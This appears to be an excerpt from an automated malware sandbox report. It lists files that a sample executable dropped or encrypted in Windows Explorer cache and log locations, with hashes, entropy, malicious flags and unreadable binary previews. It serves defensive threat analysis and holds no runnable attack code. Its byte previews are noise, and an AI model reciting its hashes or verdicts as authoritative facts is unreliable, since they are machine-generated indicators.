                  SHA1:A1251A1E44B84914F81D2D7BCCF673C7A771B61C
                  SHA-256:1BEE2018C173AEBE635C78B286580344F85998F1B5A9BADDC4A0256EC66B4421
                  SHA-512:25B37DAAE6E41860F107E9FFF420857F4757E30098342B74533AF017122E56D6AB7D1533E6E7887D39C9175A5D33F93509CD5623121B8D18802FC1229ABF2321
                  Malicious:true
                  Preview:.....c...#0../..t....i.t..6.q$.8....T.T.t.^..J.eAk-.........R....B3..O.#h..{f...TB.23.u.l....n.VZ...7...%eE....I...&.6.^....*.U7vZ..,....4..3,..z.S..$.!..n|....HK.o~..%......0.|.>...~..L..r%.9.c.~s}-..0?..e.q6$I..*.z..\.^_.-M...?2{e}$...V..!...8..AcD.:9...a.KH.g...Noa. .f!a.Q.;...O.A.......@...A...+.$.......EQ.:..8.|...fnY..D..#2.!.2..E......bN.=.td}.....{.6._.1Q2.R.[....G.......jJ.*pK..,.7.H.N...9h>..6.".T.......FJ....}j:.0..O..Q........zD..Z.........\.fV..h.k_4..SQ..xJ..b...A.1>.........H....i5...N{.g...{..Ty.....I.-Z..nI..M.<C.f.?..a36>M....a...~.Q.'.wOz...VV...2F.O..h...#@.G.@.E(.u.BP..=..#.T......T.t........4.[..,.1...[.xF...j.c...IP......C.73"...\...(wV.E7..o..0&...g.7c=#E_....p..I...\...t.....6......K./.mCr.a.n......G.`......RUg.....J.+..w.4tpA4. 4.#O....?..S9lk:.9.;A.!O....7...;......Wl..n....:;.....+.p.w-..Bat).....T......d.K.v.F..F..?.o.4=uJbX.#7....i..kl.XsD..3..V.....8...........A..o'...gT....G5N.e..#.!.q..Y.X%..?...}I......&.g

                  C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000004.db

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):105422
                  Entropy (8bit):7.9984888404006
                  Encrypted:true
                  SSDEEP:3072:OdEadVy45BhEGpyRPfapjVxfCm+8VoSBdm:KE4Vyr3PixKmkSBdm
                  MD5:8F54FC008AE4D9D7B8E3BC81B0145B89
                  SHA1:B36C03BF8CCB88E654DB606DE96417A3BA20D739
                  SHA-256:31D06126339ED26A43890FED29604DAA856E54644BD97C49469CE9B235D63044
                  SHA-512:05575C9195136FE4E56B32451D2FA67127A85A15E5657D2C9B7388F63C48009AB2D4981CFA69207D0B48DDF4C6F2A71E41DA3B54DA2473BEC8B9C52E3F81E956
                  Malicious:true
                  Preview:.... ...-..I`....I......&.W.....D^E.=..!5...f..F.S+.u.#.p.nG.].....*...5@.4....3.}.?.>.......O|.Q.8["...N.&W<..Z.....|.T..M ......]G#3.3.,?;.e...,....p.(./.^%.......Eym'.....L[c..&..@......x.a.W...')"SgV".7Q!=.l...<n...{.b.z.;.{`p.AQ.lL...M.o.D...>.F.J6h..J.]..sS......s}u...s|.r..)Q8....-........|Y...}..A.........~.....?..)..#...D,..fY.{.._.V...[r.T..6.r[.+.r..u....and....J...^YyI8.q.....;fn.IQe.l>.q..k......R...C....N..E.a.?^h...E..G/..1...m...1..h..?...!.{......._2Z..?.j.....P.;Ei........>..)...7).V8@..WA.....d..OA.>q..*..**D.@.kc..$,4.a.o[.....|q...K......P#.@(.<A.T..V..w.u.6.qv..U`<...?-..r.4...3t...W.l.....G*g...X.....{.....Pw...%P..."..?p.....LJ.^.>.!......g8.....O...U.S'..... >,....!F~...^B8..0.....y..-...6WJ....'.>K(..~..X.Bh...o.../..[..D(B.i.&O2..F\..Z......l.!....8rR?A#.G.....O\)..A....bn...1.5s.Y........V..z....T...&..Ia......7....k....\.J.X..;`..V..%...a.R.u.k...G.N.X..^.....f....].C..G......^1.t.Z.#.........x.#.O...:..9....

                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ExplorerStartupLog.etl

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):639310
                  Entropy (8bit):5.731658733571238
                  Encrypted:false
                  SSDEEP:6144:1Xvvizssahqw9ckuq3UBXTy6/76KsZW/h3E+NJ:FvvIshjIqkBXTyG7pJ3EgJ
                  MD5:B66111BD2638BEE4BA16DFC9BEC0580A
                  SHA1:44F4829EFE1EB7772395A8E0E52CC3F39EA32F5F
                  SHA-256:0B7717537AB3ADFAA05DA7320C3F294AA7FCD7A0A05BC0BB2EED580D567EC8C0
                  SHA-512:EB7CB82FF2043EC9863473E44A294B07C52D7AD60F51D7EB3FBFC6B2221C569964E3D194BBB9FC7105FA9E0144E92040F22A92A66084E68E14EA96F4961D35BF
                  Malicious:false
                  Preview:. .........'.......L.*\...............9.3..(..Hr......G..'..5...GP.h.x.....C......\..y..).lGl..C;f.[&..1)j~..B.V`.-W.I.;..&....g..G.......HO...(d..&.w.qdC.......Uc.........\K3li.?.,.K*...ndd..G2...^...Eq..e...x'... .......k.I#.}..,..;...<..F.......S..F......q...Z..).K...?.P.;.FG..|G..@=.<.+......z6..{#..z.*:.U.Lm..P`X......)q..3....K.y.J..&`!p....d..@...0f._C.. ..l..=...+-.........aRB.....W.b.T.\W..LGP.BH.9D13..).w!..'.MP....=z.....7..EF.....+..~........ #MV6...%.q.yz\.-i!a...zt.<c........Y.J.9V.T.t.....V..)1...u./'|.?j..Ave2f...SE.^...%.E~.>.v..V..n0..f.>.1...E.C.%.P.......+0_v,i.U......bm....>.....t[..._..B//.h.!.....E.....>.T&...[|p"....[..o...M,..W.'............>...y.....<mp..7..I.....P.H?V.<.....<s.$.n.6M.y5f...B{...VK.?....>[.`.&.n'.z..t..J...f.n)....d.n.6a.e......`........h....eJs.|;._.t....w.........9u..0.......3.F....#.<...c"..-.....i..O<....'....n.."...B.......M.....~K.....y\@..mM.C9.z..|.._.[x..N.<....a..#....i.c.....k....F

                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ExplorerStartupLog_RunOnce.etl

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):24910
                  Entropy (8bit):7.992951917588445
                  Encrypted:true
                  SSDEEP:384:SqL4uRTLmxplUF4qta38IWgHQU5dPk43/z3CB8jwO0yArAXOxjehY85Y:jLxRnmUq0k8Y9Hz/OBxO4r78a
                  MD5:30B4C4296EBE8149974E0CA9E7D088B6
                  SHA1:93CFA06B7389066A2701769AA7677C19E8CEF174
                  SHA-256:FDA436CDA2F896522195341567FBA8BCEA9C28F7ED4251BCB64C2D2C134EFF03
                  SHA-512:3511313E67912AA12441D1471A1820969028BB5B1BEF466B6776FA2AC4857B9FCB5DB017EAA89C33CBDC202A1EA976C11D7FB78703CAC3C9E60DAAB58B5B7C39
                  Malicious:true
                  Preview:. ...7...;....gH.3.2..a.G/.0....r..B.B+..e....X@.:..8...}.p=.oZ..'9!NE..t.D.....ek...?O..............4.*aXy. ..D..L{E|....w.pT.o1-.!;.S].W#.*.0,m......X..>.ki.C.jD...*.`zP...l...U...&..M6..\-).w@..Pye.I..!~...G..73.?.n.u.SD.x.W.I.G..2]....RM..!..,[....(.i....=.2F.\`....U.n....].......NI....'.JXF.Z...J)K..q.m........68.6..7.3...;@.}3X.+>"....*....9S.....m....Q.:...a../.].u.~.T..=|h....C....0........FT.S....@..[../ ..9...,..P..^...4]..L[n.x.+..........g...........`l...]w.~=9...J.]..m.......Z;..9Q..<v..l..XK.i<A.....Nw{!.!sK#).}I.Nh......E.95.c........B.`Q.7...R...4...{6.Qh...:.......].A..R^b...`L..V...H.{..8.1.....t.t...{.H...$&'.t ...92.?yh.e.&~.......UaM..C.yF.^.B.|.......z.X.>.r.....,.+..3..2.]....eN....m.o......~?.....H.V..~.SQc>..d?...........d....(t..4._...e...O.9~..=V&....Q..4.uu./.H.Z.f...7...u.l......I..>U...i.._..O. .....K.....'... {..k.U....u..+..,......H..M....R(V.....T../1m<T.. ..h..b.I.<.....D_C.r..C..))%K...*.d......11.

                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_1280.db

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):358
                  Entropy (8bit):7.413115359801028
                  Encrypted:false
                  SSDEEP:6:j2CH8HCym+fV8bfOBCtKs6VyRq1ranzjiflYhCfaKNQm5e2UBBOsVolWbz6Wciik:j2CvAt8bfuEKnVTZaPjhqanm5pY36Wcq
                  MD5:5B9F147087B4E273BC3DFBE7EE152DA8
                  SHA1:24C19B0AAD363100C9376A1A323B9455E7CDB857
                  SHA-256:463CFEE213B5A90EFA334619A4490DF375537DD72B89E412E6C9F1CED2622CD9
                  SHA-512:DC39129C8022948D159CAC35617D0C451A6D6098F642E8F97A0B56571A62C78169828215169DEE2512196E0C8A2E57044DFA28C3E23429BC2E814C95A31FA8A4
                  Malicious:false
                  Preview:CMMM #.X../.]..Zy...{z!...&...V..||.I.p....=&v...'..5. ..........1.~.Ik]...co..\+......6....@S_.:...d..O....P..%J..?...L..]...Qo.&..w..^.6.T..n.!VYcv.Pw.:>7a...T.p|....^...Z..e...e[....W..np......0.8n....=.).....0..@.d....}..l\.....U.d.{.'G...S^....5.\..'Sk@g...%..Si0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_1920.db

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):358
                  Entropy (8bit):7.290795667226111
                  Encrypted:false
                  SSDEEP:6:BwbxUpArGe0eF5nAafLmN1yIUfMfG1540JliUFvgYIbVZdNBBOsVolWbz6Wcii9a:0xUpAtrjA7KfGy57lBFvmN936Wcii9a
                  MD5:D531781713C06A4FCF909AB63E9F3D11
                  SHA1:3F531CD3DB182C78F218BD5037813C641CC8F132
                  SHA-256:DBCEB7397C4BB251AE016E83AEAAA1A61B6160679FC38120434348DA3FFDF16C
                  SHA-512:C641FE52E0F45534A5A71F50F029EBF33AD785859FCDD434A54EE75FEB415109A7DBD61F294BBAC51654101058291866DE72B60831BE35A643CA809CD569FD54
                  Malicious:false
                  Preview:CMMM .......,..9/~4.>|.3.'f7~n.....]...#..Q.D.m.@..M.Fw..n.oZj..S......{.....S...W.*._.."}..5D...;..#...).1.E.....br.I.Y.dVV.....6.._..... ..k.F..:.{.T}.-q..{5...{d.K.G.7.)J.....CWv.m....x....k=.\.?.?..`...'..,..u.(..&dK2_?.^S.nH!.l/.p.C$.-|A...N-a.,>z.....^.....j..3..i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_2560.db

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):358
                  Entropy (8bit):7.298139774720778
                  Encrypted:false
                  SSDEEP:6:0+qp8gu8odIXMYqmheHYMnujrPuE3Qn4Q8xAH8i4WonfyOQfbOsVolWbz6Wcii9a:0ggu8KIcO4HYMsrH44Q8xAHzBofyO09T
                  MD5:215892B6691393F5B6DE4C3705F7E96E
                  SHA1:CA04CE81B401F527365C6C255EDF792732217EC0
                  SHA-256:543D0F9C8EA27EA57093669437A96E36BEA9EED27EF537FF4908A259115511D2
                  SHA-512:63026156E3137E0BD5E263FF99D4B466B2BE3A643C17D0BA3E41A45ECAC40764FC7B4FDEAEBE87E9DA06F7444248E98A40532B9D4FE1445080E1BF95555142F0
                  Malicious:false
                  Preview:CMMM .#j.W.0_)..4O;.E.j.~-.sZBt.)...~M....9...$...!..W.z.&.i........g.D.<.q. ...@#.\...vzD&..r|....M.....15s'..B.K..3?A#..7<...s..i.....j\...C..`..aI..e......!....F...[.c...?.]..em.Q.|.....u..N.].]...4.oP.W...*...+6...'O..o.Z..]....`........%......dER....=}".w2...i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_768.db

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):358
                  Entropy (8bit):7.290003533205646
                  Encrypted:false
                  SSDEEP:6:oLByVSkJhrLvCCZ/GJTKqLTPq7n5WN5nmTr/1rLjzs+kOsVolWbz6Wcii96Z:XSihrDhoTbT65WNJcZr4l36Wcii9a
                  MD5:A536D789B7DFBDE714C29A42BD7CE132
                  SHA1:217F475643E10CC00A03B79F0A291031D8519ED8
                  SHA-256:101B949012D918B8D578E95F430371D25379EB862E37C079469A6BFBA13FA370
                  SHA-512:2EA21ABA1411C5B16FA6DF7F5AC906054D3400D7FA49D9A8F837C25FD137C583948F3CBD806AC44CC6A2B14A29B793CFCD4F46840F366027772A3FBE367FC3FA
                  Malicious:false
                  Preview:CMMM ..g.C=.M..16..H....K/.s...Eik.;|..V.....[..Q..3q.y.l.*...O...!...f.y......b9.v..7.1....|Z.=..e.6...w.%P.....(.\;d.@~nM..")2Vi....O.".&..A\6.C....Yg.j@..s.f..;n^$p.;4..9...U.z\...I. F....S.FR.K.?......z.....+..%;.X.*...LY.f..'"V$...^...0..a.q3g.L.....\.a?.2./...i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_96.db

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):358
                  Entropy (8bit):7.322421059353604
                  Encrypted:false
                  SSDEEP:6:0Xja7NMQKT1hs24xhDeljWsdxf1lByxJXN8HXSjjnnMMOsVolWbz6Wcii96Z:uj95T4242ljWsjBkdyS3736Wcii9a
                  MD5:082BA707D961923E83DD0A09BEC623F1
                  SHA1:3FB31AC99271E9FD43E6A12FEB934C6A1700D895
                  SHA-256:8F892B5D3A96461FF96C204E744897BA3352DF8A0496699583D91DC13C2EB7A8
                  SHA-512:A5FD4AE1BAEA41C315EA6CB93B47B7236C883FA1C05071EE88DAEF049696CD2BE43E4FC720F043007C4F979591073288C5A8C0A5F0C379C5D9F4F14FC33F8D8A
                  Malicious:false
                  Preview:CMMM .....q..r....V.=b...KY......ZF..&.H~/&...nu.._.O....M\F{....].c[.|..m<..i.<7...RC..._..]Nu....f9.Q......^0.~........R..'=..9J_9&..0~.......X.p.......L .Y.l.$.C.`a.er.l..]..>....G...4.3.,..G...Z;Y.E........^+..IY.?V../w..h.. ...cX......D....e....M%.f......2..)%i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_custom_stream.db

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):358
                  Entropy (8bit):7.309034005251196
                  Encrypted:false
                  SSDEEP:6:3hHkcPvmvC53xXfBbiIlvld7ZqE6xWN3WJJYIC9HCNJMpg2PPPAOsVolWbz6WciD:3hEUmvG9BbiIdtGxPU9HC062I36Wciik
                  MD5:59AEF6583E87270487B7DD71B6DD79F5
                  SHA1:52C712728F7823834B81113ED4249042BB93A1CF
                  SHA-256:B3967AA8123A90311044A81C39ED15DCBC4BF6F4BF0BFE826D32EF59265AA8A0
                  SHA-512:C8034C0B1F65CA7275C5CAF2A59629C51DDDCAB484608826690B840342E0F20CA727873D77C0B6F2F856A93C39C2806A45304EF7F7E94F5C0DF962949D141C41
                  Malicious:false
                  Preview:CMMM ..f..l]BM.u.Q.d.n...)g.X.G....3....M..\.O@..1..9...".O-...2K./..3..kR..h.&H7:,;.z.%..n...X.y..a) ..t...G'[.._G.kh.V.[......1.......8>A@..6........1&IY...._..L2c.*.....^.(.;".......I.S...f..C^.j$Oz.22...a/t..E...G}5>..#.e-N..?......b..r>.%...+..K.....^...2.~YC.....i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_exif.db

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):358
                  Entropy (8bit):7.284857966055517
                  Encrypted:false
                  SSDEEP:6:jdJdH+al2GfCHoLFOlcPPDvIG1LGcjr7cwGxsapZgk3TwFu3v4OsVolWbz6Wciik:jdJ1R2GfCTcPzIG1LGCr7LLapZgk39gT
                  MD5:6DB78AB849B0C490D5D4291B1FACED5F
                  SHA1:AB34378014AB21D14C62584DB5638A95D4BB2C8F
                  SHA-256:1CF0514EA9999A5A95A519986DF10E90F0B50B7BD984CFCD84DE82D426DB9282
                  SHA-512:7DDFFC407A1AEDD2170C1311DAD211AD206E3CA5CF35E601C191CA9038321582ED6F5AADE327108E8FEEFAA381AC7DE276908C5C335F31CC7D54801C858AA301
                  Malicious:false
                  Preview:CMMM .....X@./.:"]#..1lt<.].....=.u@W.nU=...e..;.b..u]........x....@.dc.....c..--c\J..i.5k.T....t;M2\..(zA...i.w..."..Q;.}....n....X...m-Jc*.c....Y?#..`).Se.:..e.....Tv..b.,...U`.\;.#..o.B.[......'R..A..W....1.``.....#.%m#.d..=...-%.^.'l....4.....yw.U2r.A..55...p..i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_sr.db

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):358
                  Entropy (8bit):7.315763840442256
                  Encrypted:false
                  SSDEEP:6:uzZGjhoHVHgTqUZSX0KAQoGpNbMAottiUpqHWobZhmZOsVolWbz6Wcii96Z:05HVAOrcqNbB0MoaWobTO36Wcii9a
                  MD5:5A989147A43BB618499AF94240910D9A
                  SHA1:F428A98E0C0513EA7FD5C1E41915C0B3923F6292
                  SHA-256:AC11A7C696D97050725DC7E3B859EB3244D1BD3811F62A6B61979F030AC4BAC1
                  SHA-512:83635368E4E5E46EBC62AAEF8F8ADE36471C3436984E9104AFD30048FCAE32075194A4927B99C5896CF358A7EABA855161B3B55852BB8A963743C632CB6AA8E6
                  Malicious:false
                  Preview:CMMM /g}...._G..$.i.....].$.....L...i=.../.}..Q7..>....IVB..c.....iT(..........$MO.i.?xG....\.....o...f.m-..-F. "&...4!..........v...u.F..R.e2........3....;.....bUM}a..Y..!R...r.....\I&O..j...]....7cgX.`..^3.\<.|L..@<<.=c.....b.s.s.>.......4.......h.'.C.l....C...7.i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide.db

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):358
                  Entropy (8bit):7.358411982914231
                  Encrypted:false
                  SSDEEP:6:8KBpyurau+G7o9o0+Llh11b4Qp/SOmkfFZrS2nx7V7ROsVolWbz6Wcii96Z:8KrLl+soELd10QpfdZx7VD36Wcii9a
                  MD5:6BF0CF124D17240E729A8CF29FAB26C8
                  SHA1:681080EF2F982DD00B71E5540A0D2BB3B4BC8E14
                  SHA-256:EEC556C0B8636476758F9F410FAEAABC9FCA646F9B43F38586FAA92775CB6772
                  SHA-512:065130466FC724B76652C086E6346E653293A3BCCE657A2FEB45F646341D16556F653D9653C42F3F35863E554B246FBCE1A33160DC92322D5AADE2139F623D56
                  Malicious:false
                  Preview:CMMM .+..%.......*.9I..k.;....yU,......cq~...~..Z.W....R.... W..[...O.. {..,.<..[.h..C.{bX.......EK@`..MK.......%`.....W.r.....3..k.z.......p.b...;.. A...8..~;F.:..U......d.=.:.(.i1<..0.K.wS.O......6..1.Y0B...n./]....lo.....:..7'.E..|....(..l%|..p..d.bOEd.7i5..x.j.i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide_alternate.db

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):358
                  Entropy (8bit):7.29012087694626
                  Encrypted:false
                  SSDEEP:6:ID4l4ccPAYd9CIKt6OZrbaMis31h4drQYzC3Vf8XVJ8fVLaBXaeROsVolWbz6Wcq:b0P3qpt6ORH7FWN7zMVf8j8LM5D36Wcq
                  MD5:3EC4C84C5A13735EE14ACDD8D655131D
                  SHA1:3AB6FF743DB4768A4603CDF3088C07F4D9D35841
                  SHA-256:6D6D79094708775BA0D42BA49166156514C72CDD820669EB180078E2FE7A1F5D
                  SHA-512:E3B411C226A408A0EF39D46E9E2F80330DF12C9AB4E41E11A7B3DB379077A282A956C4D98924F9F4C8C936B4E18CD407A07E2B8196EE66D6E700DFA159CAC34E
                  Malicious:false
                  Preview:CMMM .B..Zy...U....z..bc..+L.\-F..q....i.i..e....;9.OV..1......8i.u......f.!E5..1r.Q...]..rx.....o..!^5v.....TJi^.5..n.%{.>...d.&.x.Gl.O....af.#...F..}... ..J...H..H.o..,v...U5...:Q.....yh...a....z.......".k...F..@JS..^9..O.....W.qs...Z.j.[2.M.......+..&...........ji0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1280.db

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):358
                  Entropy (8bit):7.350293502271216
                  Encrypted:false
                  SSDEEP:6:mtsJTruP+Od1ql/FtcasF0sRSckuyeTfE2xBfGR8Fa0BH/Iu6QB2ST5kqWDSvihH:m6u/1GzQFB8LeoWsOa6fI9q1v4D36Wcq
                  MD5:68DB669DA1655E3B611D12B61739FFB9
                  SHA1:1ABAA78C3434EEF753210EFEE99E32D09E19609F
                  SHA-256:FD2FBE8396781C1A0A02F6D50BB9F1F1C7411B5E38A84538C9B207413C291252
                  SHA-512:3EFE712BA9611BBCD73A4C4FDA6F3093487ADBC430CA2320962AA1731DA276975959E79BA606658111433E07DFE7C1D01CEFAC44C9C3E43E819BC8C3B5D95A97
                  Malicious:false
                  Preview:CMMM ....^2l..H..T....&.>XHh...F(.j5y....,...D.\.....k9]..JI%..Z..Nt........?.7.)#2..*.axY..z./.*..+e..c ..P.h_..._..U.P!?&...vxJ...W.>8x. %.6..\.!....$.B..t..Aw%...}.x....G..Z.p.cmz..zb..ne...W[.`K_xG.I-N>@.. V..>....]..|J...iu.%.Q.......`....p....J."..{Xo.Ca.:.....i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1920.db

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):358
                  Entropy (8bit):7.171089653337079
                  Encrypted:false
                  SSDEEP:6:TH5Yhg2W6nuBhY47kExQtIzAZHK41cXCUpdH7lO6qPyIUDXqP+qD9e3OsVolWbzD:THkpuTY47+t8Uq8ch3IcqGTx36Wcii9a
                  MD5:A770DDDC747F46B47818FFCA281CAEFF
                  SHA1:8CA318066C14CA068415F10CDC7C450699FD5072
                  SHA-256:82EEBC83172B27766D46CB9C7FC5BBBA1C5B50E5C093EE7B567CAE628468FC4D
                  SHA-512:81B283614AE4FD0D3D41E7E3BD539688742DD06AA14BC79135A9A01F783DEC7AB1114880F801F315E7F2E912047FC35853DEC079EBE1C4BE4AD23C04AE731144
                  Malicious:false
                  Preview:CMMM $.riE-_..h..j\.4;L.[:.YI_f..c.|z.Z0.Ka...t...$c._.A....y...B.O.6p.h+kW.4.*..Q0.yX.X..ya.kJ.<.I.......fd.A..g`......C./H63....yg..r.......q..c..U. .0.$qO'..k.......-Y\h.C..H.-(;...&.....3..l.wb...S.~.8.DW-7UXct.dtW.F....xb^1............Z)...kvff..{{O...m.g....'i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_2560.db

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):358
                  Entropy (8bit):7.236864661356143
                  Encrypted:false
                  SSDEEP:6:KedDNXcvT8qm+Nunwa21DyxdY6fQmwC4C9OsVolWbz6Wcii96Z:tdBmm+N8wa21D6IV236Wcii9a
                  MD5:756952D68069EA32B570BD6578200791
                  SHA1:7DF8350DBC790C8D708E63191A4988483B15D31B
                  SHA-256:78F7FDCB50B6C21CC8648552E9411A0861A6BF9C45F5824C2E8F330D2EED0AE4
                  SHA-512:1A4A311FD545A2CF085F28195291F7F0FF9ED29B1A44D9284B9A6A8C2521C08A9E6342E117416D958DF97D4EB9F692FFF0852349D456C5DD8E892ADF7A1CA6E7
                  Malicious:false
                  Preview:CMMM ...t....\%..^*...y.c.x..t.XIY.(cQu.~#).....uFwKa62..9.z)"...KH7...k.9h.?.[\Y=..`.q.{.,..R<f.g_.....V*.(.=.{....@....A.!.H9.d.v...Yhzlx...]....... ..X...g%.w]....#GVN.;m.."%..'"...N....{.O.#.@......+d...._.....+..;..+.28)....O.7...Lw....DU...Z%...(.M.(B.....;C.qB.]Qi0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_768.db

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):358
                  Entropy (8bit):7.2700000151645
                  Encrypted:false
                  SSDEEP:6:49KJddilt2sB6r7fTXykc236x2XG7gpq8fasj1VBJAABOsVolWbz6Wcii96Z:VTsIbTXykcEXM8fFRFAAT36Wcii9a
                  MD5:054C6DBFB55C6F0B645367603B609B14
                  SHA1:722E013D6B249357F6A0072A6913E3571F06D463
                  SHA-256:0BB304AFFC858E5B40F19CC038864487E054708F00E694DB3530E1D76C2386E1
                  SHA-512:8D24183D751002CC613F5A4F02A1773E9B1988ECE938BEE20DC47EB2542E8CACB7CE5CA58B8FC03B7F9F8F15427F9491DAE10004C63946224F104184544372E6
                  Malicious:false
                  Preview:CMMM ....1.=...s...0..h.&<.../..ekBY.d...n.3..A.=.;./$..G7{..yOW8g...&N...-..&.....H14.b..4'jP......:.2./oF.9......Jp.P@....6.J.ZS......w=M.Kx#T.j...ed...2IxT.P2n......E..T.&.h...T.O.N.G...x'.....*...K...}...;.......j....0NU...L.d..[..9.02...8\....sS..h..<<.....i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):4194638
                  Entropy (8bit):4.326623816323724
                  Encrypted:false
                  SSDEEP:24576:8WHwbWyPHaVnFNVQ2I8wHXJH9KPauPgnr/GTvYImqrYEz7xiFmi6ft:8WHQbSnFNV+FH9KyuPMr/oeqrYEz7xis
                  MD5:3F297147256D25F602E28DBC93B83E67
                  SHA1:7F59B054BF50EDDC78CB51E60B21592B48E5E1E0
                  SHA-256:9E8F48B1A143AF6A6FF9300DEDFC36B4443F5273C9B9B12480A57594FE0EDCAD
